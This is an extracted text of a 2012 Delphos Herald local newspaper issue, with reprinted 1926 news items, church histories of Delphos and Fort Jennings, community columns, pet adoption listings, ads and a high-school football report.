New Orleans, La. – A full account of Christopher Columbus’ last voyage, a roster of his crews, their salaries and all incidents of their trip, were said by Dr. Rudolph Schuler, archeologist, to be contained in manuscripts brought here by him from Central America. Dr. Schuler, who for the last 27 years had conducted archeological and linguistic research in Central America, came here with the view of having Tulane university publish the results of his years of labor. The scientist said he unearthed unpublished accounts of Columbus’ last voyage to America, together with a history of the survivors of the expedition, while delving into ancient Central American and Spanish archives.
Delphos Herald, Sept.
22, 1926
----------
Two crooks in wreck near Delphos
Two men believed to be of the genus “yegg” are in the Van Wert County Hospital at the present time and awaiting transfer to jail as the result of an accident, shortly before midnight on the Lincoln Highway at the bridge over the second creek west of Delphos. An auto, said to have been stolen, was wrecked. The men gave their names as Casey Mitchell and Leo Armstrong, both of Ft. Wayne. The car, a Nash roadster, struck the concrete wall of the bridge and was reduced to a mass of wreckage. Mitchell was driving at the time and was caught under the steering wheel and was badly injured. His companion was asleep and also was injured. Passersby picked the men up and brought them to Delphos to a local physician. Two guns, a 45 automatic and a 32 automatic, were carried by the men, and fuses, dynamite detonators and ear drum protectors used for protection during explosions were found in the car. These awakened suspicion and the police were called. They, in turn, notified Sheriff Johnson, of Van Wert County. By order of Mr. Wagoner, the men were removed to the Van Wert County Hospital in the Harter and Brenneman ambulance. Mitchell is about 22 years old and a married man.
Delphos Herald, Oct. 19, 1926
----------
Attempted robbery figured out
The mystery of the attempted robbery of the Mueller-Chevrolet garage and of the
Roaring 20’s news Those Were The Days
BOB HOLDGREVE
STATE/LOCAL
Window to the Past
change of heart by the intruders which caused them to depart without the loot has been partially explained. Upon reading the account of the attempt in the Herald Wednesday night, Merchants’ Policeman Art Kohn was reminded of the strange actions of some people in an automobile on West Second Street Tuesday night and the police are of the opinion that these were the guilty parties. While making the rounds on the night in question, Mr. Kohn noticed a machine with headlights burning, parked on the north side of Second Street, across from the Mueller-Chevrolet garage. As it was about 2 a.m., he considered this deserving of attention and crossed the street and walked behind the car. He then noticed that the rear license plate was missing. He immediately called the night police from the city building. The people in the car noticed that they had attracted attention and, honking their horn, sped away. The police started after the machine, which, in the meantime, had made several circuits in the vicinity of West Second and headed west on the Lincoln Highway. The police followed, but their machine was unable to match the speed of the fugitive car and they made their escape.
Delphos Herald, Sept. 30, 1926
----------
Greatly pleased with appearance of Delphos
Admiration for the city of Delphos and surprise at the great changes which have been wrought here were expressed by J.W. Berryman, St. Marys, upon occasion of a visit at the O.J. Brenneman home, 501 North Canal Street. Mr. Berryman was accompanied here by his wife, who had never visited Delphos. Mr. Berryman had not been in this city for fifty-six years past. Needless to say, he found many changes. He was greatly pleased with the appearance of the city, commenting upon the prosperous appearance of the business district and admiring the beautiful residence streets. He also spoke of the excellent walks which have replaced the old board walks which he remembered, and found a great improvement in the streets.
Delphos Herald, Sept.
14, 1926
----------
G. & L. Boot Shop changes ownership
A change in ownership of the G. & L. Boot Shop is announced, and it will be known as the Z. & L. Boot Shop. Jos. Zimmerle, Toledo, and Alex. Lindemann have purchased the store from N. C. Miller. The new owners intend to move the store into the Zimmerle building and will occupy the room which is now used by the Moorman & Myers grocery. This room will be completely remodeled; a new front will be installed, also a new steel ceiling and new shelving. When completed, it will be a modern shoe store in every respect. Mr. Zimmerle was born and reared in Delphos and has many friends here. For the past 15 years he has resided in Toledo. Mr. Lindemann has been in the shoe business in Delphos for many years past. Ten years ago, he and Mrs. Lena Goebel started this store in its present location. Six years ago, it was sold to Mr. Miller, who conducted it until now. Mr. Lindemann worked in the store also. Mr. Zimmerle plans to move his family to Delphos in the near future. Mr. Miller states he has not made any plans for the future.
The Delphos Herald, Sept. 14, 1926
----------
New library hours
A new schedule of hours for the Delphos Public Library was placed in effect Monday. This new schedule is expected to prove a convenience to the general public and especially to the pupils in the local schools. One of the most important changes is to have the library open during the noon hour. This will give the pupils, especially those residing outside the city, a place to spend the noon hour in a profitable manner.
Delphos Herald, Sept. 14, 1926
----------
Itinerant uses “canned” heat
An itinerant named James Marsell of Missouri was arrested on North Main Street Thursday night. He is said to have been imbibing on “canned heat” when he was arrested. He said he ran out of liquor and took the canned heat. When released, he was given 10 minutes to leave the city.
Delphos Herald, Sept. 24, 1926
Pastor Dan Eaton
‘It began with a dream in 1932’
Pastor Dan and Janie Eaton
There is a lot of room for improvement in America today, but 80 years ago things were really tough. In 1932, the economy was in bad shape and unemployment was at 24.5 percent. Thirteen million Americans were unemployed; there were few jobs, and tens of thousands of ordinary Americans loaded up their belongings and lived in cars going from place to place looking for work. People lost their homes, and shanty towns appeared around the country, built by homeless people using wood from crates, cardboard, scraps of metal, or whatever materials were available to them.
In an effort to keep more people from losing their homes, the Comptroller of the Currency announced a temporary halt by banks of foreclosures. The Revenue Act of 1932 raised United States tax rates across the board, with the rate on top incomes rising from 25 percent to 63 percent! Things were so bad that 43,000 marchers, including 17,000 World War I vets who were supposed to receive army bonuses, marched to Washington, D.C., and set up campgrounds demanding early payments of cash bonuses to help survive the Great Depression. Troops under the orders of General Douglas MacArthur advanced with bayonets and sabers drawn under a shower of bricks and rocks, but no shots were fired. In less than four hours, the troops cleared the Bonus Army’s campground using tear gas.
The Emergency Relief and Construction Act, enacted July 21, 1932, was the United States’ first major relief legislation to fund public works, hoping to put millions back to work; it was enabled under Herbert Hoover and later adopted and expanded by Franklin D. Roosevelt as part of his New Deal. Government and companies implemented wage cuts up to 30 percent for those lucky enough to be employed and cut working hours for those employed, hoping to provide more jobs for those who were unemployed. Due to malnutrition and poor health, tuberculosis became widespread throughout the US.
Perhaps because of the bad things happening in our country, a Delphos resident, Tillie Hershey, started having prayer meetings in her home. Mrs. Hershey began to have a dream of a Pentecostal church being in Delphos. A tent revival was held in the winter of 1932. The revival was so successful in reaching people that a building was purchased at 1104 N. Washington St. and the Full Gospel Tabernacle church was born. Five years later, the church became affiliated with the Assemblies of God.
In 1950, under the leadership of Pastor C. L. Gruver, the church relocated and built a new sanctuary at 808 Metbliss Ave. During 1954 to 1956, Rev. Anthony DePolo served as the pastor. Under his leadership the completion of the exterior of the church was accomplished and the name of the church was changed to “First Assembly of God.”
In 1961, Rev. Warren Campbell assumed the pastorate and the parsonage was built next to the church. Rev. Daryl Sharp became the pastor in 1971 and led the congregation in the building of the multipurpose center now known as The ROC (Righteous Outreach Center). In 1985, Rev. Terry Collier assumed the pastorate and on March 8, 1987, groundbreaking took place for the current sanctuary. The new sanctuary was dedicated on Nov. 15, 1987.
What started with a dream in the heart of a woman has resulted in 80 years of ministry to Delphos, the surrounding communities, and the world. During those eight decades, God has called people from our church to become pastors, evangelists, and missionaries. Our wonderful church family has given and continues to give and to pray, which has enabled other churches to be planted in America and around the world.
My wife, Janie, and I are so pleased to be the pastors of Delphos First Assembly of God. This year, we are celebrating our church’s 80 great years of ministry. However, we believe that the church’s best years are not in the past, but are yet to come!
FREE TAX SCHOOL
Register now! Courses start Sept. 13
Earn extra income after taking course. Flexible schedules, convenient locations. Small fee for books.
Liberty Tax Service
Call 419-229-1040
50th Annual Ottoville Park Carnival
“Always Labor Day Weekend” — Friday, August 31st, Saturday, September 1st & Sunday, September 2nd
FREE LIVE ENTERTAINMENT
FRIDAY, AUGUST 31st, 9:00 p.m. to midnight: Brother Believe Me — Ohio’s Finest Live Rock Party Band
SATURDAY, SEPTEMBER 1st, 8:00 p.m. to 11:00 p.m.: 50’s & 60’s Dance with Polly Mae
SUNDAY, SEPTEMBER 2nd, 4:00 p.m. to 7:00 p.m.: Tractor Square Dancing
Viewpoint
“History is the sum total of the things that could have been avoided.” — Konrad Adenauer, German statesman (1876-1967)

This and That
by HELEN KAVERMAN

The Lutheran Church
Life in small town America often revolved around church and school. This was true in the 1800s and is still true today. The German Lutherans were among the first to put their feet down in Jennings Township. The Raabe and Discher families arrived in 1833. They were accompanied by John Hedrick. This group from Hessia, Germany formed the nucleus of the Lutheran Church in Fort Jennings. A group of Catholic settlers arrived in 1834. These early Christians had an unusual arrangement. They built a log cabin in 1840, which they shared for worship services. The Catholics had Mass in the cabin on Sunday mornings and the Lutherans conducted services in the same building in the afternoon. During the week the log cabin served as the school for both groups. This log structure was located on the southeast side of the road next to the VonderEmbse property. This financial and administrative ecumenism was a result of their experiences in Northern Germany, where the religion of the people changed from Catholic to Protestant, according to the religion of the ruler of that area.
The St. John’s Evangelical Lutheran Church had the distinction of being one of the first churches established in Putnam County. The parish can trace its official origins back to 1840, when the two congregations shared the same building. Unlike most churches of that period, the parish began with a full-time resident pastor. Rev. Keniston made his home in the Odenweller House. Rev. Keniston served the parish well until he died of cholera in 1855, during the epidemic. The Raabe, Discher and Hedrick families formed the nucleus, but others instrumental in forming the Lutheran parish were Jacob Freund, Christoph Bleuthman, Johann H. Allemeier, Johann W. Allemeier, Christoph Ritzman, Frederick W. Allemeier, Henrietta Allemeier, and Adolph Allemeier. Itinerant pastors served the congregation following the death of Rev. Keniston. One of these traveling preachers, the Rev. Furham, drowned in the Miami-Erie Canal at Lock 13 while making his way from one parish location to another. The congregation outgrew the log cabin and better building materials came available,
IT WAS NEWS THEN
One Year Ago • After the parade dust settled and the last corn hole bag thrown, the Marbletown Festival Committee found this year’s event raised more than $3,000. The festival has been the financial thrust behind improvements at Garfield Park off South Clay Street. New sidewalks, a shelterhouse and grill and a Garfield School marker have been added since the festival’s inception in 2006. 25 Years Ago — 1987 • Barbara Schmidt, business manager of The Delphos Herald, has retired after 25 years with the company, Thom Dunlavy, publisher, announced. Schmidt plans to do some volunteer work and some traveling, along with her hobbies of bowling and reading. • Girl Scout Troop 83 of Fort Jennings demonstrated lummi sticks at the Ohio State Fair in the Girl Scout booth. Lummi sticks are an American Indian rhythm game. Girl Scouts at the fair were Missy Utrup, Lisa Swick, D. D. Warnecke, Laura Wittler, Kate Schroeder, Melissa Maenle and Crystal Birkemeier. • St. John’s volleyball team returns six letter-winners and is preparing for a successful season. The letter-winners include setter Laura Shaw, hitters Cyndi Kortokrax, Bev Fisher, Elaine Wrasman, Vicki Kunz and Tina Kill. Other squad members include senior Amy Gerdeman, juniors Anne Hohman, Lisa Sadler, and Betsy Wittler and sophomores Nikki Wellman and Jill Schimmoeller. 50 Years Ago — 1962 • The newly crowned Miss United States Twirling champion, Jean Ann Roode, 19, of New Knoxville, will present two exhibitions at the annual Volunteer Firemen’s Homecoming and Picnic at Waterworks Park Sunday. She will appear at 4 p.m. and will do her fire baton routine at 8 p.m. She has made a number of appearances with the Delphos Eagles Band. She was with the band in Dayton when it won first place in the state contest, and she appeared with it at the national convention in Pittsburgh, Pa. • Dr. Burl G. Morris has been re-elected chairman of the board of the Ohio Federation of Chiropractic Organizations. This will be Dr. 
Morris’ second term as head of the state-wide group which was formed to coordinate and combine the activities of all Ohio Chiropractic organizations. As first chairman of the OFCO, Morris participated in the writing of the by-laws and constitution of the new group. • Sunday will be the red letter day for the golfing contingent of the Delphos Country Club as the tourney finals will be in full swing. Final play in the men’s championship flight will get under way at 1 p.m. with John Yerick matched against Bud Miller. In the Men’s Flight A, Romus Brandehoff and Dr. Earl Morris will vie for the championship honors. Tom Honigford and Jerome Altenburger will play to decide the Flight B championship. 75 Years Ago — 1937 • The first day and night of the Allen County Fair proved to be a big success according to all reports. A large number of fair visitors were on the streets during the afternoon and evening. The dance pavilion enjoyed the best opening night in the history of the Delphos Fair. Carl Dienstberger and his orchestra played for the dancing. • The local Auxiliary of the American Legion, yet in its infancy, has received a special merit citation for the fine work accomplished since its inception. Announcement to that effect was made at a regular meeting conducted in the Legion rooms. Mrs. Dell Cochensparger and Mrs. Frank Mundy, delegates to the state convention held recently at Columbus, presented their reports. • Rev. Julian A. Garrity, a native of Delphos, has been transferred from Chicago to Cincinnati, where he has been made pastor of St. Xavier’s Church, one of the oldest parishes in the city and located in the downtown district. Father Garrity is a cousin of Lilly and Henrietta Lang and Charles Lang, West Second Street, and of Otto
making a modest frame church possible. The new church was built on Lot 38, across from the hardware store. In 1940, the building was still standing at the home of Mrs. A. H. Raabe. According to printed St. John’s histories of 1940 and 1965: Rev. Alstetter and Rev. Fliener served both the Fort Jennings and Delphos congregations for a time. The influx of settlers had brought the Lutheran and Reformed into the community and no distinction had been made between these two forms of service. With the pastorate of Rev. Huebner, 1871 – 1876, these differences were emphasized and the Reformed withdrew to start their own congregation in Delphos. However many of the Reformed remained with the FortJennings Church, but it was necessary to combine the Fort Jennings and Delphos Lutheran Churches into a parish. Rev. Irick and Rev. Reitz served these two congregations until 1880. In the earlier years of the Lutheran Church, no records were kept. Therefore it is impossible to find the first persons baptized or buried when the church was first formed in 1840. The children were normally baptized very soon after birth. So it is highly possible that before the first structure was built, baptisms and services took place in the homes. In 1882 there were three recorded baptisms. They were the following: Johann Frederick Zenner, Anna Katharina Rudka and Maria Ellen Cumming. The first recorded deaths in the parish were in November 1883. There were three: Johanne Hettrich Jacob, Johann Friedrich Jenner and David Otto Jenner. Rev. Born began his pastorate in 1880 and both congregations had grown to a point where they needed the full service of a pastor. This was accomplished with the calling of Rev. Schnepel, who was the first full-time pastor in Fort Jennings since Rev. Keniston. This marked a turning point in the congregation as it began to expand. A parsonage was erected at a cost of 350.00. Mrs. Schnepel was well known for planting several fruit trees on the property. 
From 1902 until 1911 Rev. Bailey served the growing congregation during what was regarded as the golden era of the church. A new church was planned and built. The cornerstone was laid in 1903 and in 1904 the church was dedicated to the services of the Lord. The good people of the parish made many sacrifices of time, labor, talent and wisdom. This resulted in the church being debt free on the date of dedication. The church was adorned with beautiful memorial windows. This was followed by periods of trouble and crises. The following is a list of pastors who served the parish through the years that followed:
1912 – 1914 — Rev. Grim
1914 – 1917 — Rev. Florstedt
1917 – 1919 — Rev. Schulz
1920 – 1924 — Rev. Boerger
1924 – 1927 — Rev. Mollenkoph
1927 – 1931 — Rev. Shawkey
1932 – 1941 — Rev. Stroh
1941 – 1960 — Rev. Spithaler
1960 – 1962 — Rev. Florstedt & Rev. Heuer
1962 – 1964 — Rev. Oestreich
Churches in Fort Jennings
Student Pastors served for short time periods and Rev. Hare served in 1974. Rev. Cox was the pastor when St. John's closed its doors. Rev. Mettermaier of St. Peter's in Delphos assisted the Fort Jennings congregation during many of those years, especially between pastorates. In 1933 the church was redecorated through the kindness of Cornelius Kortier. The parish celebrated 125 years in 1965. At that time the parish had a baptized membership of 126 and 92 confirmed. The church basement had been enlarged and renovated in recent years at a cost of $10,000; this included a new furnace in the parsonage and a renovation of the parsonage. A water softener was also installed in the parsonage. The church interior was washed and the roof repaired in 1965. Many people of the town have fond memories of Rev. Spithaler, who was pastor from 1941-60. Everyone knew him; after all, he was also a school bus driver. Ecumenism continued in Fort Jennings. School and public events included both Catholic and Lutheran pastors. At high school graduation exercises and banquets the Invocation was given by Father Miller, with Rev. Spithaler giving the Benediction.
Rev. Cox served the parish for many years. He mentioned how the Raabe family had very strong ties to the church. In 1978 the church received extensive remodeling. The Raabe families contributed a substantial amount of money toward that project even though none of them live in the community anymore. The Chapel was named the Raabe Family Memorial Chapel. The church was restored inside and out, with many businesses and individuals contributing money for the project. New carpets were installed, pews were refinished, the fellowship hall downstairs was remodeled with a modern kitchen, the church was re-wired, new plumbing was installed and the building was sandblasted. James Shroyer, another man of the parish, was pointed out by Rev. Cox: "At age 92 (in 1985), he is our elder statesman." He noted that Jim Shroyer was very active in church and civic obligations. Cox remarked how the Lutheran and Catholic congregations had a very good relationship in town. When the Raabe families lived in Fort Jennings the church was very important to them. When Howard and George were 11 and 13 years old, they acted as church janitors, getting up at 4 a.m. on Sunday mornings to fire up the furnace. The church took a few hours to heat up. Music was a very important part of the services. The organist who served the longest was Ellen Cummings, who played until she was in her 80s. Others who followed were Dorothy Huber, Ann Dienstberger, Cathy Hammons, Ann Klausing, Carl Wieging and Janice Freund. Special music was sung for Christmas, Lent and Easter. One musician told about a Service of Darkness with a Lenten hymn for Good Friday that had 17 verses. One verse would be sung, one candle was then extinguished, and a short sermonette was given between each of the 17 verses. By the end of the extremely long service, which ended in total darkness, at least one person was always caught sleeping.
Each year in September, a Homecoming was planned. It was a time when previous members returned to their home church in Fort Jennings to renew old friendships and have a fellowship day together. It was always a full church. A big carry-in dinner was always planned with special music. Clo Chandler reflected on the time around 1959. Several barbershop quartets came to sing. Kenny Raabe sang in one of them, called "The Applechords." It was great singing. The "American Lutheran Church Women", previously known as the "Ladies Aid" and "The American Federation of Lutheran Church Women", was a vital part of the congregation. In the 1960's this organization became the A.L.C.W. Those groups were avid fund-raisers as well as prayer warriors. This group held monthly meetings and regular bible study. Another breakthrough in Ecumenism came in the early 1970's. It was not part of the women's official organization, but several women felt a strong need to reach out and find a common ground to unlock and share their faith. At this time, Sister Paulette and Sister Jackie were serving in the St. Joseph's Parish. Clo Chandler and Janice Freund, along with the Sisters, started an interfaith prayer group. They met in homes and did many activities together. It truly was being one in the Spirit. Rev. John Cox was the last pastor to serve the Fort Jennings Parish. He went on to serve at Christ Lutheran in Continental. The last person baptized in the parish was Timothy Schlatman in July 1982. The last funeral officiated was Rachael Wannemacher's. Some families associated with the Lutheran Church over the years were: Freund, Friend, Wreede, Hammonds, Schramm, Geckle, Chandler, Shroyer, Bilimek, Blockberger, Sarka, Peters, Allemeier, Leatherman, Ladd, Cuming, Persinger, Stirm, Dowler, Kortier, Raabe, Arn, Plasic, Kimmerle, Ratliff, Davis, Bluethmer and Adams. Paul Allemeier was the fifth generation of Allemeiers to attend the church. His ancestors were among the founders.
St. John's was dissolved 31 January 1988 because "the congregation simply became too small, they were no longer able to support a ministry there", said the Rev. Michael Scherer, of the Northwestern Ohio Synod. Some of the parishioners have become members of the Lutheran Church in Continental, while others joined St. Peter's in Delphos. The church furniture and pipe organ were donated to a Lutheran Mission Church in Lake Zurich, Illinois. One of the former members of the church in Fort Jennings had moved to Lake Zurich, and became a member of this little Lutheran mission. She ended up using the same pews she had used as a child. The 19 stained glass windows of the church were carefully removed in November and December of 1989 and donated to a newly constructed mission church, Christ Lutheran Church of Elk River, Minnesota. A crew of 5 removed the windows, along with the frames. Jack Holmes of Elk River said the cost of a new round 6-foot diameter stained glass window would be between five and six thousand dollars. The name plates went along with the windows to Elk River. They bore the names of Stroh, Raabe, Kimmerle, Arn, Yenner, Davis, Friend, Freund and Brenner. The church bell will also be used in the steeple of the Elk River Church. The church building was demolished in March of 1990 by Gasser Contracting. Phil Oney gathered up some of the bricks for his patio, as did other residents of Fort Jennings. Mrs. Eda Kohls lives in a nice home on the former church lot at the corner of Main and Fourth Streets. The church parsonage next door was purchased by Tony Recker. The Recker family has extensively enlarged and remodeled the house. During the last formal service on 3 January 1988, the members took communion. They then took their communion supplies to Christ Lutheran Church in Continental as a symbolic gesture of the two churches joining together. It was sad to say "Good-Bye."
Many former parishioners are resting in the old Raabe Cemetery on Road 20-P, east of Fort Jennings and in the Calvary Cemetery on Route 190 near Fort Jennings. Sixty-four pages of birth, death and marriage records were obtained from archives in Columbus through the efforts of John Freund of Fort Jennings and John Freund of Van Wert. These records can be found in the Bicentennial History of Fort Jennings, 1812 – 2012. A second printing of this book has been made, with copies available at the Commercial Tax Office in Fort Jennings. St. Joseph's Catholic Church The first group of Catholic pioneers arrived at Fort Jennings in July of 1834. The Lutherans had arrived in 1833. According to the Boehmer letters this group included H. J. Boehmer, Ferdinand VonderEmbse, B. H. Biester and his daughter, O. Deters, Dina Wilberding and J. H. Wellman. Wellman was from Langfoerden, Germany. Boehmer and the others were from Steinfeld, Germany. According to the 1998 Blue Book (History of St. Joseph's), others in the "group of 10" could have been Agnes VonDerembse, Henry Frederick Wellman and Mary Wellman. Soon thereafter came Ferdinand Gerking (King), Christopher Helmkamp, Casper Gerker, Calvelage and
VonLehmden. The Rekart family arrived in Putnam County after spending 10 years in Pennsylvania. Imogene Elwer wrote in the Blue Book that most of the early settlers first purchased land across the river from the fort. She discovered this information in early tax records, found in the court house attic. Since there was no employment to be found in this area, Boehmer returned to Minster, where he taught school for a couple years. He had been a teacher in Germany. While in Minster in 1837, he married Mary Wellman, daughter of J. H. Wellman. They returned to Fort Jennings in 1838. Boehmer taught school in Fort Jennings and traded tobacco, whisky and other supplies for furs and skins with Indians and settlers from his cabin across the river. In the early days of Fort Jennings the spiritual needs of the residents were provided by the Rev. William Horstmann, of Glandorf on the Blanchard River. He and John Kahle arrived in Putnam County in 1830. They came from Glandorf, Germany. The Professor, as he was known, possessed a great missionary zeal. In addition to his home parish, he traveled to Wapakoneta and Minster to attend to the spiritual wants of the Catholics there. Noticing the number of Catholics at Fort Jennings, he added that community to his missions and in 1834 said Mass for the first time in the home of one of the pioneers. Father Horstmann was also well versed in medicine, science and woodcraft. For four years he made the 18 mile trip to Fort Jennings about once a month. As time passed Father George Boehne was sent to Glandorf to assist Father Horstman. The Rev. Tunker, a pastor in Dayton, came to Fort Jennings in 1838. He stayed a year or two. According to several local histories the Rev. Henry Herzog arrived in 1840. However the 1998 Blue Book states that "The Rev. Henry Herzog came to Fort Jennings in September of 1846 but remained only a year or so." (More about him later.)
Most historians record that Father Horstmann again served the Fort Jennings Catholics from 1839 to 1843, when he passed on to his great reward. The Blue Book lists Rev. George Boehne as serving the Fort Jennings people from 1841 – 1846; then again from 1847-1848 (traveling from Glandorf). During that time Rev. Herzog arrived in town, probably in 1846. He was not appointed by the Bishop, but remained in town for a year or so. Rev. Herzog stirred up trouble wherever he went. In Minster he created such a problem that Bishop Purcell of Cincinnati assigned another priest to that parish to restore order. Herzog left Ohio for a short time. After his arrival in Fort Jennings in 1846 he functioned as a priest, but without assignment. The records of the Rekart family indicate that Rev. Herzog performed the marriage of Sigmund Rekart and Mary Discher on 4 February 1847. In 1848, two priests from the Minster area wrote to Bishop Rappe of Cleveland, (the Cleveland Diocese was formed in 1847) wondering “what can be done with Henry Herzog”, who was reported living with the Boehmer family in Fort Jennings at that time. The Bishop of Cleveland wrote to the Bishop of Cincinnati, regarding a letter he had
(See Fort Jennings page 8)
Saturday, August 25, 2012
The Herald – 5
COMMUNITY
LANDMARK
From the Thrift Shop
The Humane Society of Allen County has many pets waiting for adoption. Each comes with a spay or neuter, first shots and a heartworm test. Call 419-991-1775.
PET CORNER
CALENDAR OF EVENTS
TODAY
9 a.m.-noon — Interfaith Thrift Store, North Main Street.
5 p.m. — Delphos Coon and Sportsman's Club hosts a chicken fry.
7 p.m. — Bingo at St. John's Little Theatre.
SUNDAY
1-3 p.m. — The Delphos Canal Commission Museum, 241 N. Main St., is open.
1-4 p.m. — Putnam County Museum is open, 202 E. Main St., Kalida.
1:30 p.m. — Amvets Post 698 Auxiliary meets at the Amvets post in Middle Point.

Daphne has been nursed back to health and loves people, is good with children, is playful and likes other dogs. She graduated her basic obedience class and won the class's agility competition. Sadie is a grey tiger cat who has had one eye removed - it has not slowed this playful gal down one little bit. She's ready for a loving home - and toys! Lots of toys!
BY MARGIE ROSTORFER
Thank you all for your prayers, thoughts, well wishes and support for Scott, his wife, Carrie, and the German and Rostorfer families since Scott's accidental fall last Thursday evening at Michigan International Speedway. Who would ever guess that falling a mere 14 inches could threaten Scott's life with such severe brain/head trauma? After being life-flighted to the Toledo Hospital, Scott underwent immediate surgery to alleviate the blood clots and rapid swelling of his brain. He has given us some scares these past several days and remains in a coma and on a machine to help him breathe but he is young and strong — two definite pluses the doctors say; but the biggest plus is God. Speaking of pluses, did you know that the Delphos Thrift Shop was named one of the top three thrift shops in the region? We're actually ranked second and are extremely proud to be named in the "Best of the Region 2012." They listed highlights of the store as "the boutique area where shoppers can find name brand jewelry, clothing, designer purses and antique items. With teenagers heading off to college, stop
Happy Birthday
Aug. 26 Gracie Gunter Kristi Gillespie Troy Calvelage Carter Mox Anthony Martz Andrew Martz Aug. 27 Kevin Sendelbach William Nomina April Patton Jessica Conley Keri Hetrick Camden Gable
by the shop for blankets and sheets and household items. Other highlights include the toys and books for sale.” The Board of Directors were excited about the ranking and the article that described the shop and the various departments and items that can be found here. With the end of the recent Lincoln Highway sales, be sure to check out all the great bargains and high quality items that have come in. All of the departments are benefitting from the donations that came in through the drop-off window and the selection is great. The board has finalized plans and set the date of Sept. 9 as the Open House for the new addition. The public is invited from 2-4 p.m. to view the new addition which houses the book department, toy department, the Food Pantry, and the Social Services Department. There will be no sales conducted during the Open House hours. At the last board meeting, it was discussed that a Facebook page might be in the works for the Thrift Shop. Stay tuned as the details get worked out. Shoppers have been heard to say that they’ve tried other shops but nothing beats the prices, the
selection, the cleanliness and the quality of the items at the Delphos Thrift Shop. There was a shopper in recently who was visiting from North Carolina and was just thrilled with what she had found. She comes several times a year and she said “everyone is always so nice, too.” Another customer was thrilled with all of the artificial flowers and greenery she found, saying that she “couldn’t wait to get home to decorate with it.” If you’d like to be a part of the volunteer team, call the shop at 419-692-2942 or stop by. Your help, which is desperately needed, will be greatly appreciated. Also needed are your shopping bags — all sizes — and bubble wrap for breakable items. Selection plus bargain prices plus friendly people plus cleanliness equals a pleasant shopping experience. Come enjoy all the pluses! Until the next time, that’s this month’s report.
The following animals are available through the Van Wert Animal Protective League:
Cats: M, F, 1-15 years, brown, black and white, gray tiger, yellow tiger, tabby, black, long- and short-haired, fixed; F, 1 year, fixed, front dew-clawed, black, long-haired, named Lily; M, F, 8 years, 4 years, white with yellow, black, fixed; M, 5 years, fixed, gray, named Shadow; F, 1 year, gray tiger
Kittens: M, F, 3 months, gray tiger, rusty, calico; M, 1 month, dump-off, black; M, 6 months, orange and white, named Ziggy; M, F, 3 months, black and white spots, black and white; M, F, 6 weeks, black,
gray tiger
Dogs: Yellow Lab, F, 1 1/2 years, shots, named Haley; Black Lab, F, 5 years, shots, named Sally; Yellow Lab, F, 6 years, named Samantha
Puppies: Blue Heeler, Collie, Cocker Spaniel, Lab F, 3 months, black, shots, medium size; Jack Russell, M, F, black and white. The APL will contact you when the pet you're looking for becomes available. Donations or correspondence can be sent to PO Box 321, Van Wert, Ohio, 45891.
THE DELPHOS HERALD
Telling The Tri-County's Story Since 1869
Thanks for reading. News About Your Community.
405 N. Main St., Delphos, OH 45833, 419-695-0015
Got a news tip? Want to promote an event or business?
Nancy Spencer, editor, 419-695-0015 ext. 134, nspencer@delphosherald.com
Don Hemple, advertising manager, 419-695-0015 ext. 138, dhemple@delphosherald.com
Downtown Delphos
Better health, one step at a time.
St. Rita's Medical Center and Lima Mall are helping you stay in shape all year long with the "Healthy Steppers" mall walking club. This self-paced program lets you go at your own rate and gives you access to a safe, climate-controlled environment where you can burn calories, elevate your heart rate and make new friends along the way. To get started, sign up for free at Guest Services in Lima Mall. Just for joining the program, you'll get a welcome packet that includes a t-shirt, car magnet and other fun stuff guaranteed to put some pep in your step! Plus, you'll earn prizes for keeping track of your miles and reaching the designated milestones.
Step on over to Lima Mall and sign up today.
Strong 2nd half spurs ‘Cats in opener
By JIM METCALFE
jmetcalfe@delphosherald.com
WAYNESFIELD — Sometimes, halftime adjustments in the game of football are less about Xs and Os and more about taking a deep breath. That is what Jefferson head coach Bub Lindeman and his coaching staff did in Friday night's 2012 season-opener at Waynesfield-Goshen High School: they slowed down their troops. Trailing 14-13 after 24 minutes on a beautiful summer evening, the Red and White dominated the second half in all three phases, seizing a 38-17 victory. "That's really all we did; got them settled down. We made mistakes we hadn't made during our two scrimmages, so you feared they'd rear their ugly head at some time," Lindeman explained. "Fortunately, we have great senior leadership and the kids responded. They played with great effort and became more aggressive, especially defensively. For example, we read their option the first half but the second half, we played downhill against it and did much better." The Wildcat defense, which had given up 208 yards of offense the first half, held the Tigers to 75 in the second. It wasn't all peaches and cream, though; the visitors fumbled on their first play from scrimmage the second half, with Waynesfield's Cole Sackinger recovering at the Jefferson 42. However, senior safety Drew Kortokrax tipped a pass over the middle from senior quarterback Garret Miller (7-of-18 passing, 78 yards, 3 picks) to senior teammate Chris Truesdale, setting the Wildcats up at their 34. They did not take advantage of that but they did after forcing a fumble, with Zach Kimmett pouncing on it at the Tiger 38 on the next WG drive. Senior bull Quentin Wessell (13 carries, 84 yards) rumbled for 23 and then went up the gut from the 15, powered through arm tackles and found paydirt at 8:22. After junior holder Ross Thompson tried to run in the 2-pointer from the spread extra-point formation, and after discussion by the referees, he was ruled not to have gotten in, leaving the score 19-14, Wildcats.
The Wildcat defense forced a punt on the next possession. Kortokrax gathered it in on the leftside numbers at his 20. Originally juggling the pigskin but not drop-
SPORTS
Weekly Athletic Schedule
FOR WEEK OF AUG. 27-SEPT. 1
MONDAY
Boys Soccer: Ottawa-Glandorf at Fort Jennings, 5 p.m.; Kalida at Shawnee, 7 p.m.
Girls Soccer: Jefferson at Miller City, 5 p.m.
Boys Golf: Jefferson and Columbus Grove at Spencerville (NWC), 4 p.m.; Leipsic at Ottoville (PCL), 4 p.m.; Crestview and Ada at Paulding (NWC), 4 p.m.; Ayersville at Fort Jennings, 4:30 p.m.; St. Marys Memorial at Van Wert (WBL), 4:30 p.m.; Celina at Elida (WBL), 5 p.m.
Volleyball: Van Wert at St. John's, 5:30 p.m.; Jefferson at Waynesfield-Goshen, 6 p.m.; Ottoville at Parkway, 6 p.m.; Continental at Lincolnview, 6 p.m.
Girls Tennis: Elida at Celina (WBL), 4:30 p.m.; Van Wert at St. Marys Memorial (WBL), 4:30 p.m.
TUESDAY
Boys Soccer: Spencerville at Botkins, 5 p.m.; Van Wert at Lima Central Catholic, 7:30 p.m.
Girls Soccer: Lincolnview at Crestview (NWC), 5 p.m.; Elida at Wapakoneta (WBL), 7 p.m.; Van Wert at Shawnee (WBL), 7 p.m.
Boys Golf: Jefferson and Lima Central Catholic at Columbus Grove quad (NWC), 4 p.m.; Kalida at Van Buren, 4:30 p.m.
Girls Golf: Parkway, Ayersville and Hicksville at Lincolnview, 4:30 p.m.
